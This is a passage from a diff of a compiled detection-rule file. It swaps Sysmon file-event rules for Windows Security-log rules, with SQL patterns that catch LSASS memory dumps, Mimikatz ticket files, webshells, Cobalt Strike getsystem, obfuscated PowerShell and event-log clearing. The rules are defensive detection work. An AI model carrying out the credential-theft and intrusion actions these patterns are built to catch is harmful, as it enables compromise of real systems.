'%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", - "author": "frack113", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", - "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "System administrators managing certififcates." + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + "description": "Detects an installation of a device that is forbidden by the system policy", + "author": "frack113", "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", - "status": "test", - "description": "Detects the creation of a macro file for Outlook.", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "Addition of legitimate plugins" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) 